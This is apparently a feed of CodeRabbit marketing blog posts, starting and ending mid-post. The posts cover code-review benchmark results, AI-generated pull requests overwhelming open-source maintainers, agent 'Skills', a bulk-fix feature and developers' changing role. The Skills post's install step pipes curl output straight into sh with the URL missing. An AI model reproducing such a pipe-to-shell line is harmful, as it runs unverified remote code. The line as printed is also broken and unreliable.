Optimizing the precision-recall tradeoff But what really are Precision and Recall when it comes to code reviews? Put simply: Precision is a measure of the % of true positives out of all review comments from a tool. Mathematically, this is a measure of the true positives in a tool's comments. If a tool returned 100 comments and it had 80 true positives, and 20 false positives (wrongly identified as a bug) then its precision rate is 80%. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/76bd6eb7db3844b2255df92895ac5b1dda8695da5778482147b8785e00df4351_7de9256f6b.png) Recall is a measure of the % of total true positives found by that tool out of all bugs that exist. Mathematically, this is a measure of the comprehensiveness in a tool's comments. If a tool returned 50 comments but there were actually 100 real bugs in the PR then its recall rate is 50%. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f1fc74f29d7cb729613f146f766236803683c2cecf9444f7b0b50c0a1b7a7b78_e4f0ad601e.png) There's a common assumption when comparing code review tools that the best code review tool is the one with highest precision. Fewer comments, higher precision, sounds intuitive right? However, CodeRabbit has always taken a slightly different approach. CodeRabbit is specifically engineered to have a good balance between precision and recall. We would rather flag a real bug you choose to dismiss than miss a real bug you needed to see. This comes from optimizing not just for high accuracy (precision) but for both high accuracy and surfacing more bugs (recall). Optimizing for both precision and recall leads to catching the highest number of real bugs. [![](https://victorious-bubble-f69a016683.media.strapiapp.com/407ee1cbb7537be8e5b9166c27f274951ad7725d0840443053724b4aaaf8381d_8fd92f9027.png)](https://codereview.withmartian.com/) *High precision, high recall, leads to more true positives being found.* The reason why the online benchmark approach is important is that the offline approach often will flag a false positive when a code review tool finds a real issue that the benchmark's gold set doesn't include. High-volume tools like CodeRabbit simply surface more issues that the gold set didn't anticipate leading to bias against tools with higher recall. By not relying on a curated set of "correct” answers, the online benchmark sidesteps this oversight. It counts what developers actually did in their PRs. They found that devs acted on CodeRabbit's comments at roughly the same rate as tools that comment half as often. By surfacing more comments CodeRabbit ultimately catches more critical bugs. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/af53beb4f6be14db9de015308bc0a40badeaf79c297f08c7b8a507a1ceeb74c0_604e993da9.png) ## Offline benchmark tells a different story (and that's the point) In the 50-PR offline comparison mentioned in [Code Review Bench](https://codereview.withmartian.com/), CodeRabbit showed a lower F1 score than the online analysis that included comments accepted by devs in real PRs. They are transparent that the offline benchmark has "significant divergence" from the online data that needs to be improved. They describe two specific problems that affect high-volume tools disproportionately: * **The gold set is incomplete.** The offline comparison started with a dataset of known bugs curated by two other code review vendors but they found some comments that were scored as "false positives" were actually real issues the gold set didn't include. * **Offline and online benchmarks are designed to disagree.** Code Review Bench built both specifically so they could identify these kinds of gaps in the gold set. As they expand the gold set and calibrates against real-world behavior, they expect the offline rankings to shift. ## Conclusion We are glad to see this independent confirmation that our approach works in the real-world by catching more bugs that other review tools miss. We've always believed that the job of a code review tool is to catch as many critical bugs as possible and trust developers to decide which ones matter. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a1e7ac9b54df01c9c91ff3f203652a17896e0e7bbd6eccc3a3c237962a884fc2_69be2bc353.png) We also allow for configurability to tune the kinds of bugs caught based on each team’s needs and improve reviews over time. CodeRabbit is built to be thorough by default while also being configurable for your team’s noise tolerance with controls like Chill vs Assertive review profiles (fewer vs. more comments), path-based instructions, and Learnings to customize your reviews to the issues you want surfaced. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3c2df465e70d106ac9a79424eb9f2d6dbb8df26d5c0d392545a4c549d0f6de52_9f456de88e.png) Martian's Code Review Bench, grounded in real developer behavior, shows that our approach works and is the better choice for teams who want to ship fast (but not break things). We’ll continue to watch how the Code Review Bench results improve over time. In summary: nearly 300,000, PRs, 53.5% recall rate, and #1 in F1 metrics. Not on a curated lab test using a static list of known bugs but based on real-world developer signals. That's what CodeRabbit is built for. Explore the full results and methodology: * [Code Review Bench results](https://withmartian.com/post/code-review-bench-v0) * [Methodology and open source code](https://github.com/withmartian/crb) Interested in trying CodeRabbit? [Start your 14-day free trial](https://coderabbit.ai/) today.

AI is burning out the people who keep open source alive

Aleks Volochnev — Sat, 28 Feb 2026 00:00:00 GMT

Over the past few months, one refrain has been heard consistently in open source communities: “AI slop.” It shows up in [LinkedIn discussions from CEOs](https://www.linkedin.com/feed/update/urn:li:activity:7417250625391915009/) who rarely complain publicly. ![Coding agents are ripping apart OSS communities ](https://cloudmate-test.s3.us-east-1.amazonaws.com/uploads/covers/695d7ae2e2a2e9cdf5199232/1cea7f89-776b-4531-9194-23485f81892e.png) It shows up in [Reddit threads](https://www.reddit.com/r/opensource/comments/1q3f89b/open_source_is_being_ddosed_by_ai_slop_and_github/), where users only think AI slop has become worse over the past few months. ![GitHub isn't helping OSS projects fight AI slop](https://cloudmate-test.s3.us-east-1.amazonaws.com/uploads/covers/695d7ae2e2a2e9cdf5199232/98cfdc23-407c-4b02-8e17-e90da5cec839.png) In [Twitter posts from popular OSS projects](https://x.com/tldraw/status/2011911073834672138?s=20) who have begun automatically closing pull requests from external contributors. ![tldraw shut down PR from external contributors due to AI slop](https://cloudmate-test.s3.us-east-1.amazonaws.com/uploads/covers/695d7ae2e2a2e9cdf5199232/bcd78199-003a-4b72-bffe-2c7d148ae9b5.png) The theme is consistent: projects are being flooded with AI-generated pull requests that merge cleanly but don’t actually work. Some maintainers are adding stricter contribution templates. Others are asking for smaller PRs. A few have temporarily limited new contributors just to regain control of their review queues. This isn’t an anti-AI backlash. Most of the people raising these concerns use AI themselves. Even a prominent figure like Peter Steinberger, the creator of the popular AI agent [OpenClaw](https://openclaw.ai/) (which was recently acquired by OpenAI), is struggling with the overwhelming volume of PRs. Despite his own heavy reliance on AI tools, he has [publicly requested a better solution](https://x.com/steipete/status/2023057089346580828?s=46) to manage the pace of incoming contributions. ![OpenClaw drowning in AI Slop pull requests](https://cloudmate-test.s3.us-east-1.amazonaws.com/uploads/covers/695d7ae2e2a2e9cdf5199232/fcaae4a4-e587-4c63-916d-475474f07666.png) ## My own experience: Slop galore As a maintainer of open source projects, I integrated AI into my coding process. Initially, this combination felt ideal as development gained momentum, contributors submitted fixes faster, and issues were addressed more consistently. The shift in open-source development felt invigorated; problems that once took months were now resolved in hours. This speed was beneficial when AI augmented human judgment. However, as the focus moves toward fully automated agents, a crucial element is diminishing. The issue with many of these automated pull requests isn't technical syntax, but a failure of judgment. What I didn’t expect was how much time I would start spending reviewing pull requests. That wasn’t because contributors suddenly got worse, or because AI made people careless. Writing code stopped being the hard part. Open source has always depended on the hard parts to act as a natural filter on what gets proposed, reviewed, and ultimately merged. ## Open source PRs are coming faster, but maintainers are still human Surveys like [Stack Overflow’s Developer Survey](https://survey.stackoverflow.co/) show that a large majority of developers (80%) already use, or plan to use, AI coding tools. You don’t need a report to feel that shift, though, you can see it immediately in active repositories. Pull requests arrive faster, they tend to be larger on average, and they often carry the unmistakable shape of something generated from a single prompt or a short back-and-forth with a model. That isn’t a criticism, I use AI tools every day myself and I would be lying if I said I wanted to go back to the way things were before. This is simply what happens when contribution becomes cheap. The problem many open source maintainers are running into is that reviewing those contributions did not get the same speed boost and it has become more cognitively demanding. I have seen pull requests that introduce a brand-new abstraction layer to solve what was previously a five-line change, complete with interfaces, helpers, and configuration flags that technically work but dramatically increase complexity. Nothing is “wrong” in the obvious sense. The surface-level checks-passing tests and a green CI-suggest no obvious errors. However, the reviewer's burden increases significantly; they must now decipher not only what changed, but also the rationale behind the specific implementation chosen and whether it subtly contradicts long-standing architectural decisions. ## Why reviewing AI-generated code feels harder Reviewing AI-generated code is strange because it often looks correct at first glance. The formatting is clean, naming is reasonable, and the logic flows in a way that feels intentional. Yet, you find yourself slowing down, because something does not quite sit right. You start asking questions that are hard to answer quickly. * Why does this abstraction exist at all? * Why does this function do three things instead of one? * Why does an approach technically work but feel fragile under real-world conditions? A frequent issue I've observed is with error handling in AI-generated code. For instance, I've reviewed changes where the AI catches and logs every conceivable exception. While this appears robust on the surface, in reality, it can mask critical failures that other parts of the system rely on to be visible. The change functions correctly in isolation but introduces subtle flaws by violating system-wide assumptions. Catching that kind of issue requires knowing how downstream components expect failures to propagate, which is rarely written down. Those are not questions a linter answers, and they are not always questions a contributor can explain either, especially when they do not fully own the context behind the change. Most open source projects rely on a large amount of implicit knowledge that never makes it into documentation. There are old design decisions buried in issues from years ago, conventions enforced socially rather than technically, and trade-offs that only make sense if you remember why something was done a certain way in the first place. AI does not know any of that unless someone teaches it and contributors often do not know it either. That gap is where much of today’s review friction lives. ## The real cost lands on maintainers Research on open source sustainability has shown for years that a [tiny percentage of contributors do the majority of review](https://arxiv.org/html/2312.17236v1#:~:text=Figure%201%3A,area%20of%20B.) work. So, in open source, this kind of review almost always falls on the same small group of people. You see the same names over and over again on merged pull requests. Maintainer burnout did not start with AI, but AI made it more visible by removing many of the buffers that once kept it manageable. More pull requests come in. Fewer of them are obviously wrong. Each one requires more careful mental simulation to feel confident it will not cause problems later. That often means scrolling through files, replaying edge cases in your head, and asking yourself what you are about to miss this time. It is slow, quiet work, and does not scale well. As the effort required for review outpaces the availability of reviewers, projects suffer a gradual decline rather than an abrupt failure. The symptoms include slower responses and accumulating unresolved issues. This eventually discourages contributors, who cease participation due to the lack of timely feedback. What is interesting is that many projects have started adapting without making a big announcement about it. You see stricter automated checks appear, clearer expectations for pull request descriptions, and more effort spent validating changes earlier in the process, before a maintainer ever looks at them. Reviews are moving earlier in the workflow not because maintainers want to be gatekeepers, but because human attention is limited and expensive. It makes more sense to spend it on intent and design than on catching avoidable mistakes. ## AI didn’t break open source, it exposed the bottleneck AI didn’t break open source. It exposed what was already straining under the surface: [reading code is harder than writing it](https://www.coderabbit.ai/blog/its-harder-to-read-code-than-to-write-it-especially-when-ai-writes-it#https://www.coderabbit.ai/blog/its-harder-to-read-code-than-to-write-it-especially-when-ai-writes-it?heading-reading-code-is-actually-harder-than-writing-it), especially when AI writes most of it. The real shift wasn’t just faster generation. It was volume. Suddenly, maintainers weren’t reviewing a handful of thoughtful pull requests each week. They were reviewing AI-generated diffs at a pace no human brain signed up for. Writing got easier. Reviewing got exponentially harder. That’s where AI code reviews started to make sense to me - not as a vague “AI assistant,” but as an always-on reviewer that runs before a human ever has to burn cognitive energy on a PR. When I started using CodeRabbit on my open source projects, it caught the obvious things immediately: off-by-one errors in pagination logic, missing error handling around external calls, subtle edge cases that only fail under specific configurations, and security issues that would have been painful to debug after a release. It flagged missing tests that technically “worked” but weren’t defensible. It forced contributors including myself to clean up code before asking for human reviewer time. Instead of spending my energy scanning for logic bugs or basic security issues, I could focus on intent. * Does this align with the project’s direction? * Does this abstraction make sense long term? * Is this the right tradeoff? The AI handled the mechanical correctness checks so humans could stay strategic. In my experience, automating feedback early in the pull request process speeds things up and reduces review cycles. When contributors know their PR will get AI code review feedback instantly, they submit smaller changes, write clearer descriptions, and fix obvious issues before a maintainer ever looks at it. The turning point for me was realizing the reviews weren’t just “nice to have.” They were protecting my reputation. If AI was writing a growing share of my code, I needed AI reviewing it with the same rigor, before it hit the repo. That’s, ultimately, why I joined CodeRabbit. The quality of the reviews, the codebase awareness, the ability to run checks locally in the IDE before pushing - it solved the exact bottleneck I was feeling in open source. AI code generation scaled output. AI code reviews scaled judgment. Open source didn’t need less AI. It needed AI in the right place in the workflow. And when reviews move left…before the pull request, before the human fatigue sets in - maintainers get their time back for what actually matters: design, direction, and shipping software that doesn’t wake you up at 2 a.m. ## Why CodeRabbit helps prevent OSS burnout Open source does not collapse because of bad code. It collapses because a handful of maintainers end up reviewing everything. AI made that imbalance worse. Contributors can now generate fixes, refactors, and feature PRs in minutes. Review still happens at human speed. The result is predictable: more notifications, longer queues, and maintainers spending nights and weekends doing unpaid triage. Burnout in open source rarely looks dramatic. It looks like this: * PRs sitting unreviewed for weeks. * Maintainers closing issues with “won’t fix” because they simply do not have time. * Fewer thoughtful reviews and more rubber stamps just to clear the backlog. * Talented maintainers quietly stepping back. That is not a tooling problem. It is an attention problem. CodeRabbit helps by acting as a first-pass reviewer that never gets tired and never rushes through a diff. It reviews every pull request line by line, checks for logic errors, edge cases, security risks, and cross-file impact, and flags issues before a human even opens the tab. For maintainers, that changes the shape of the work: * Instead of scanning for obvious bugs, you focus on architecture and intent. * Instead of manually checking for missed requirements, you validate higher-level decisions. * Instead of absorbing every small fix yourself, contributors address AI feedback before requesting review. ## CodeRabbit’s commitment to OSS CodeRabbit is committed to supporting open source software, having pledged [$1 million in sponsorships](https://www.coderabbit.ai/blog/coderabbit-commits-1-million-to-open-source). We rely heavily on open source technology and fundamentally believe that CodeRabbit's AI is a tool to assist, not replace, the vital role of open source maintainers. It absorbs the repetitive, error-prone parts of review so humans can spend their limited energy where it matters most. Open source survives on people. If AI is going to increase code volume, we need something equally consistent helping with review. Otherwise, the cost stays concentrated on the same few maintainers until they burn out. If you maintain an open source project and your review queue keeps growing, [try CodeRabbit](https://coderabbit.ai/) on your next repository. CodeRabbit is free for open source. Every maintainer, contributor, and community can use our platform to cut through PR noise, automate code quality checks, and free up more time for meaningful contributions.

CodeRabbit Skills: Give your AI agent code review instincts

Konrad Sopala — Wed, 25 Feb 2026 00:00:00 GMT

AI agents can write code, they can refactor code, they can even explain code. But they don’t review code like a senior engineer. They don’t consistently look for subtle bugs. They miss security risks. They don’t always group issues by severity or help you fix them in a structured way. That’s the gap [CodeRabbit Skills](https://github.com/coderabbitai/skills) are designed to close. ## What are CodeRabbit Skills? [CodeRabbit Skills](https://github.com/coderabbitai/skills) let your AI coding agent initiate CodeRabbit-powered code reviews directly from your local environment, CLI, or IDE. Once installed, you can simply tell your agent things like: ```plaintext Review my code Check for security issues Review my PR What's wrong with my changes? Run a code review ``` Your agent will automatically work with the CodeRabbit CLI to run a CodeRabbit review and return structured findings. No switching tools. No opening GitHub. No manual setup every time. Just ask and your agent reviews. ## What actually happens when your agent runs a CodeRabbit Skill? When your agent invokes the CodeRabbit code review skill, it initiates a CodeRabbit review through the CodeRabbit CLI tool. Specifically, it will: * Analyze your changes for bugs, security issues, and anti-patterns * Group findings by severity (critical, warning, info) * Suggest concrete fixes and improvements * Support iterative fix-and-review workflows ## Works with the agents you already use [CodeRabbit Skills](https://github.com/coderabbitai/skills) work across a wide ecosystem of coding agents, including: * Claude Code * Codex * Cursor * GitHub Copilot * Gemini CLI * Continue * Windsurf * And [30+ more](https://github.com/coderabbitai/skills?tab=readme-ov-file#supported-agents) ## Install in under 30 seconds Setup is intentionally simple: ```plaintext # Install CodeRabbit CLI curl -fsSL | sh # Authenticate coderabbit auth login # Install the skill npx skills add coderabbitai/skills ``` Now, your agent can run real CodeRabbit reviews locally. That’s it. ## Try CodeRabbit Skills today Install CodeRabbit Skills and get real code review right where you work: [https://github.com/coderabbitai/skills](https://github.com/coderabbitai/skills) Ask your agent to have CodeRabbit review your code and see what it catches.

Fix all issues with AI Agents – a quality of life improvement

Konrad Sopala — Thu, 19 Feb 2026 00:00:00 GMT

Code review is where you catch the things you missed. Fixing them shouldn’t feel like Groundhog Day. CodeRabbit already flags issues in your pull requests and gives you ready-to-use prompts for your AI coding agents. You click Prompts for AI, copy the prompt, run it in your IDE or CLI, and move on. That works great – until your PR has a lot of issues to fix.. When your PR has 12 issues, you’re suddenly doing a lot of copy, paste, run, and repeat. The fixes are fast, but the workflow isn’t. That’s why we built **Fix All Issues with AI Agents** for our git-based reviews, a simple improvement that lets you resolve every CodeRabbit-reported issue in one pass. ## Fix everything in one step %[https://youtu.be/h7bz4lvELCI] When CodeRabbit reviews your pull request, it surfaces precise issues directly in the GitHub PR interface. Previously, each issue included a **Prompt for AI Agents** that told your agent exactly what to fix. We knew the repetition was slowing you down. So, we fixed it. Now, when CodeRabbit completes a review, you’ll see a new option - **Fix All Issues with AI Agents.** ![fix all issues with AI agents](https://victorious-bubble-f69a016683.media.strapiapp.com/35bf6d5cb0bcca5449c524f9d4c35980e7b64c6eda743f83a95558922fb6fb1f_cb96a9077d.png) Click it and CodeRabbit will: * Collect every fix prompt from the review * Combine them into a single, structured instruction * Give you one prompt to copy * Let your AI agent fix everything in one run That’s it. Copy once. Run once. Review the changes. No manual stitching. No missed fixes. ## Why this improves your daily workflow This feature doesn’t change what CodeRabbit finds. It changes how fast you can act on it. You get: * Less copy-paste busywork * Faster iteration on PRs * Fewer chances to miss issues A smoother path from review to merge. It’s a small change, but it removes one of the most annoying parts of working with AI agents in code review. And better yet, it delivers all the context to your agents. AI agents work best when they have full context. This feature gives them exactly that. Instead of feeding your agent fragmented instructions, you provide a complete set of fixes in one prompt. This makes the process faster, smoother, and easier to manage. Which helps you stay in flow and ship more. ***Try Fix All Issues with AI Agents in your next pull request and spend less time managing prompts – and more time shipping.***

Developers are dead? Long live developers.

David Loker — Thu, 12 Feb 2026 00:00:00 GMT

Predictions about the end of programming are nothing new. Every few years, someone confidently announces that *this* time developers are **truly** finished. If you listened to these self-proclaimed Nostradamuses, devs were previously set to be replaced by everything from compilers ("If a machine writes the instructions, what's left for humans to do?") to low-code, no code tools ("Why hire developers when your VP can drag-and-drop an enterprise app?") to visual programming (“It looks like a flowchart, so it’s going to eliminate programming altogether). This time, the executioners are AI coding agents. Executives, founders, and tech influencers are lining up to tell the world that software engineers are living on borrowed time, that within a year or two, AI agents will write all the code, humans will step aside, and “developers” will join the long list of roles rendered obsolete. Like telephone switchboard operators or video rental clerks. They’re not entirely wrong. AI will indeed write much more of the code in a year or two, maybe even all of it for certain kinds of tasks. But rest assured, those sharing these takes are coming to the wrong conclusions. ## **“The king is dead. Long live the king.”** The phrase *“the king is dead, long live the king”* dates back to medieval Europe. It was announced at the moment of a monarch’s death to affirm continuity: one king has fallen, but the institution of kingship lives on in his successor. Applied to software engineering, the message is similar. The old model of developers is, indeed, dying out. In a few years, you won’t find devs who spend their days hand-writing syntax and carefully constructing every loop, import, and conditional. But the developer role itself isn’t disappearing. This isn’t an extinction event, it’s a succession. ## **It’s the end of developers as we know it (and you should feel fine)** The historical track record of “developers are finished” takes isn’t great. Every new abstraction triggers the same Twitter and media discourse: confident pronouncements, sweeping generalizations, and a level of certainty usually reserved for end-of-the-world cults. And yet, somehow, the world keeps running. In hindsight, these predictions look less prophetic and more like Silicon Valley’s version of Chicken Little. The story always ends the same way: declare developers dead, dramatically increase the demand for software, and then hire more developers than before. Only now, with better tools and bigger problems. Because the thing people forget is that each time abstraction rose, developers adapted. As **Grady Booch** put it on X recently: [![](https://victorious-bubble-f69a016683.media.strapiapp.com/ddb3a2047db5936d9e2b7af0439fdafb83230a23ca882f0f53039cdd21e83410_8a5ec6236a.png)](https://x.com/Grady_Booch/status/2013331606795362398) Others have been more blunt. One widely shared take summed it up this way: [![](https://victorious-bubble-f69a016683.media.strapiapp.com/4487fb536f361018c7de37d5c5d5e767f70342e6562194da8b76cc3f548fb3b0_365eb79e84.png)](https://x.com/rough__sea/status/2013280952370573666) If you squint, these statements sound apocalyptic. But read carefully, and they’re actually saying something very different. They’re not claiming engineers stop existing. They’re claiming *how* software gets written is fundamentally changing. And they’re right. ## **What’s *actually* dying: Manual syntax production** AI is getting very good at generating code. Large chunks of application logic that once required careful human authorship can now be produced automatically. Boilerplate, glue code, scaffolding, even moderately complex algorithms are increasingly cheap to generate. That means some code simply won’t be written directly by humans anymore in the future as AI improves. But not all of it. Even in a world where AI coding bots could potentially take over your job completely, they likely wouldn’t be trusted with things that we prefer human judgement around like: * Critical systems * Performance-sensitive paths * Novel architectures * Ambiguous or underspecified domains These still demand deep human judgment. And even when AI writes the code, it doesn’t mean the human role disappears. It just shifts. ## **Shift 1: From writing code to *knowing what good looks like*** One tweet captured this change succinctly: [![](https://victorious-bubble-f69a016683.media.strapiapp.com/5a4fedcf5e1e07515ecab2b997b7115d024e1aab0a5c4cadc27fff7f89a13378_3de6fa9633.png)](https://x.com/thiagotm/status/2013309376988131537?s=20) This is the uncomfortable truth about AI code generation: it is extremely confident, often persuasive, and occasionally very (elegantly) wrong. Catching those failures requires more, not less, expertise. You don’t review AI-generated code by just checking syntax. You review it by asking: * Does this match the intent? * Are the assumptions sound? * Does this fail safely? * What happens at the edges? * Is this maintainable six months from now? That’s not junior work, that’s senior judgment. And while we at CodeRabbit have created AI code reviews to help make the job of parsing AI code easier and catch bugs humans often miss, we don’t claim to be able to take a human out of the loop. A human developer is critical for catching business logic mistakes and other key nuances that AI isn’t able to. We just make their job of reviewing large volumes of AI generated code less overwhelming and, therefore, capable of scaling. ## **Shift 2: From coding, *then* reviewing to reviewing intent first** As AI systems take on more of the work of producing code, the most important human contribution shifts upstream. Code validation won’t start at the PR stage anymore, it will start before the code is actually written by reviewing the intent and plan. This is where prompt reviews are set to become central. With AI writing most of the code, developers will increasingly focus on things only they can do like: * Decomposing ambiguous problems * Understanding business goals or feature design * Specifying interfaces and acceptance criteria * Defining constraints and non-goals before anything is generated * Providing the right context at the right time * Building tight feedback loops * Designing for safety (security, privacy, reliability) * Setting success criteria that can be evaluated after the fact * Reviewing outcomes against original goals, not just surface correctness That’s a lot of work when teams have to keep pace with the speed of coding agents. And that involves being extremely clear about intent early on and ensuring alignment. After all, misunderstood intent or lack of alignment is what causes rework and delays at the PR review or testing stage. Ambiguity is what produces brittle systems. Poorly articulated goals are what lead AI to generate large volumes of code that look reasonable, behave correctly in the happy path… and quietly miss what actually matters. Prompt review is therefore set to become a key part of the SDLC in the next few years where alignment is validated *before* generation. That will involve: * Checking whether assumptions are explicit or merely implied * Making tradeoffs visible instead of accidental * Ensuring that “done” is defined, not guessed at * Validating that the output matches intent In that world, planning and review converge into a single responsibility: shaping the problem so the system has a chance of solving the right one. The developers who thrive won’t be the ones who can coax the most lines of code out of a model. They’ll be the ones who can express intent precisely, recognize when outputs drift from it, and intervene early as a team to get alignment, before small misunderstandings scale into large, expensive failures. ## Why we created CodeRabbit Issue Planner %[https://youtu.be/zHlgipben70?si=MUCX6v86faep6DmM] This shift toward an intent-first workflow isn’t theoretical for us. It’s what we’ve been seeing play out with teams using CodeRabbit. As AI accelerates code production, we’ve increasingly seen bottlenecks at the code review stage due to the volume of code AI was helping write and the number of issues it was adding to that code. Our recent study found that [AI added 1.7x more bugs](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) and issues to code than humans did. But, from what we saw, we believed that the real problem wasn’t just AI coding agents but how teams were working with those agents. Prompts were vague. Assumptions were implicit. Context lived in people’s heads or scattered Slack threads. Often AI was left to fill in the gaps and did so confidently but wrongly leading to more work at the review stage. What’s more, there was now a cold start problem where it became onerous and time consuming to draft the requirements into a prompt in a way that included all the assumptions, specs, and context so that AI could actually understand and properly execute on the code. That’s the problem that our CodeRabbit Issue Planner is designed to address. It supports developers in turning ideas into concrete, reviewable plans that are digestible by AI coding agents. It surfaces assumptions, clarifies scope, defines constraints, and makes tradeoffs explicit *before* generation begins. Importantly, Issue Planner doesn’t make judgment calls on behalf of developers like a coding agent might do if it made a plan itself. It doesn’t decide what “good” looks like. It doesn’t replace architectural thinking or product understanding. It creates an editable first draft of a prompt that can be reviewed by anyone on the team to create space for alignment and visibility earlier and to help support decisionmaking. That’s because as code generation becomes faster and cheaper, the value of developers concentrates around intent, judgment, and alignment. CodeRabbit’s planning product is built to support that reality. It helps developers focus more on judgement and strategy, helps catch misunderstandings sooner, and stays firmly in control of how they use AI in order to improve output and reduce rework later on in the development process. ## Developers aren’t going away. Somewhere right now, a CEO or two is likely polishing keynote slides about “the end of developers.” If history is any guide, they're going to be very disappointed. Not because AI won’t change software engineering (it already has) but because they’re mistaking a transformation for an extinction. What’s ending is a particular image of the developer: hunched over syntax, manually assembling every loop and conditional, measured by lines of code and hours spent typing. But the role of *developer* isn’t vanishing. It’s shedding a skin. The future developer: * Works at higher levels of abstraction * Defines intent rather than typing syntax * Reviews systems and outcomes, not just lines of code * Acts as the final arbiter of correctness, safety, and alignment As AI takes over the mechanics of production, more responsibility, not less, falls on the humans in the loop. Someone still has to decide what should be built, what constraints matter, what risks are acceptable, and whether the result actually solves the right problem. That work can’t be automated away, because it’s grounded in judgment, context, and accountability. So yes, developers, as we once knew them, are dying out. But long live developers. 👑 ***Interested in learning more about how we help devs in this new era?*** [***Try CodeRabbit reviews and Issue Planner today!***](https://coderabbit.link/8cjC8ui)

Misalignment: The hidden cost of AI coding agents isn't from AI at all

Gur Singh — Tue, 10 Feb 2026 00:00:00 GMT

***TL;DR:*** *The real cost of AI agents isn’t tokens or tools; it’s misalignment that shows up as rework, slop, and slowed teams.* ## **The conversation everyone is having (and why it misses the point)** Most conversations about AI coding agents sound like a fantasy football draft. * Which model is better at autonomous coding? * Which one topped the benchmarks this week? * Which one “reasons” better? These debates take over blog posts, launch threads, and Slack channels everywhere. Devs on Twitter compare outputs line by line, argue over microscopic differences in reasoning quality, and swap models like they’re changing themes. Surely, *this* one will fix it. But for most teams, these differences aren’t what determine whether AI actually helps them ship faster. When AI-generated code goes sideways, it’s not typically because the model wasn’t smart enough. It’s because the agent had no idea what you really wanted. The code can be perfectly valid, logically sound, and honestly impressive… and still be completely wrong for your team, your codebase, or your product. That gap shows up as rework. Or repeated prompt tweaks. Or long review threads explaining intent after the fact. Or worse, developers spending more time correcting AI output than they would have spent writing the code themselves. Turns out, we’ve all been optimizing for model quality but forgot to measure drift. The most important factor in your success with AI agents isn’t which model you picked but how you’re adopting it as a team. Because turns out misalignment is the quiet, compounding problem that slowly eats your time while everyone’s busy arguing about benchmarks. ## **Speed exposed an existing problem** Before AI agents, misalignment was annoying… but survivable. Writing code took time. If requirements were fuzzy or assumptions were wrong, you usually discovered it halfway through writing the code or maybe during review. The feedback loop was slow, but forgiving. Humans hesitated, they asked questions, and then course-corrected as they went. But now? When an agent can generate hundreds or thousands of lines of code in seconds, it doesn’t stop to check whether your requirements were vague. It doesn’t ask clarifying questions. It doesn’t say, “Hey, this seems underspecified.” It just… goes. Confidently. In whatever direction it decides you likely intended. What used to be a small misunderstanding becomes a massive diff to review. What used to be a quick clarification turns into a full rewrite. And suddenly you’re staring at a PR thinking, “Technically, this is correct. Practically, it’s unusable.” This is why teams feel like AI made them both faster *and* slower. Execution is instant. Correction is not. The faster the agent, the more expensive unclear intent becomes. ## **The overlooked tax: AI rework** When AI output is bad, it rarely looks like failure. Instead, it looks like *iteration*. You run the agent. The result is close but not quite right. So, you tweak the prompt. Then, you tweak it again. You add more context. You clarify one edge case. You re-run the agent. And then you repeat. That’s progress these days. Each cycle feels small. But stack enough of them together and suddenly you’ve spent an hour rewriting prompts, reviewing generated code, and explaining intent without actually moving the work forward. It’s also a tax that can hit teams unevenly. Not everyone is an expert at writing prompts for coding agents. A few people on your team might be great at it but no teams are stacked entirely with prompting experts. Some might be prompting efficiently and effectively while others waste hours trying to rework things after the fact. Rework can show up as: * Long PR threads clarifying decisions that were never made explicitly * Code that technically passes tests but violates team conventions * Engineers quietly thinking, *“I could’ve just written this myself”* and deciding not to use AI the next time, reducing AI adoption across teams. The worse the alignment, the higher the tax. Every missing assumption gets paid for in re-prompts, reviews, and rewrites. Or worse, it leads to bugs and downtime in production. And unlike a failed build or a flaky test, this cost doesn’t always trip alarms. It just eats time quietly. ## **Misalignment doesn’t stay contained. It compounds.** Misalignment early in the workflow doesn’t just cause one problem: it causes a chain reaction. When intent isn’t clear up front, the agent fills in the gaps. That leads to code that’s *almost* right, close enough to look reasonable, but wrong enough to create work everywhere else. Suddenly, reviews are harder, tests are more complicated, and you’re having to rewrite half the PR yourself. What should’ve been a small clarification becomes a long review thread. What should’ve been a quick decision becomes a follow-up meeting. And what should’ve been a clean change becomes a series of patches trying to reconcile what the code does with what the team *meant*. Misalignment discovered early is cheap. Misalignment discovered late is expensive. Once code exists, every correction has a blast radius. You’re not just fixing intent, you’re undoing structure, refactoring assumptions, and explaining decisions that were never made explicitly by a human in the first place. AI doesn’t create this problem. It accelerates a problem that’s inherent in creating software: unclear intent and unaligned expectations. In the past, this was solved by a quick conversation to clarify. But because agents move so fast, they push misalignment downstream at full speed. By the time a human steps in, the cost has already multiplied. You’re no longer deciding *what* to build, you’re negotiating with code that already exists. ## **The real solution: Collaborative planning** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a6292f20e471bfcf47b0bb3721a158d7130c71d6980f71c576210c72f95a59f3_ba8c4bfc54.jpg) Collaborative planning moves the hardest decisions to the moment when they’re still cheap: before code exists. You need to tackle them before agents start guessing and before assumptions get baked into hundreds or even thousands of lines of output. Instead of one person silently deciding what “good” looks like and encoding it into a prompt or worse, leaving it to the agent, teams agree on it upfront. Scope is explicit, assumptions are visible, and success criteria are shared. Intent stops living in someone’s head and starts living in an artifact the whole team can review. This changes the whole process. Agents stop improvising, reviews get lighter, and rework drops dramatically. Collaborative planning isn’t about slowing teams down or adding process. It’s about preventing the kind of misalignment that quietly drains time later. A few minutes of alignment upfront can save hours of cleanup downstream. ## **Why we built CodeRabbit Issue Planner** %[https://youtu.be/zHlgipben70] We didn’t wake up one day and decide to get into planning. We followed the failures. For years, CodeRabbit has lived where problems from AI coding agents show up most clearly: in reviews. We’ve seen the same patterns repeat across teams, languages, and stacks, especially as AI agents became part of everyday workflows. The issues weren’t subtle. We saw generated code that technically worked but missed the point, long PR threads explaining decisions no one remembered making, and repeated fixes for assumptions that should’ve been surfaced earlier. In fact, our recent study found that they show up [1.7 times](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) more than in human written code. Again and again, the same conclusion kept surfacing: the problem didn’t start in the code. It started before the code existed. Reviewing output was no longer enough. If we wanted to reduce rework, improve quality, and actually help teams move faster with AI, we had to move upstream, without abandoning what made review effective in the first place. Collaborative planning gives teams a way to align on intent before agents start executing, so reviews catch fewer surprises and you can actually ship faster. ## How CodeRabbit Issue Planner works ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dea51609d13b5ac5ba3271c03bc57ebc9e03a1c41e9e2d82de9c43126720ae42_0c5377c6c3.jpg) CodeRabbit Issue Planner connects directly to your issue tracker (we currently support 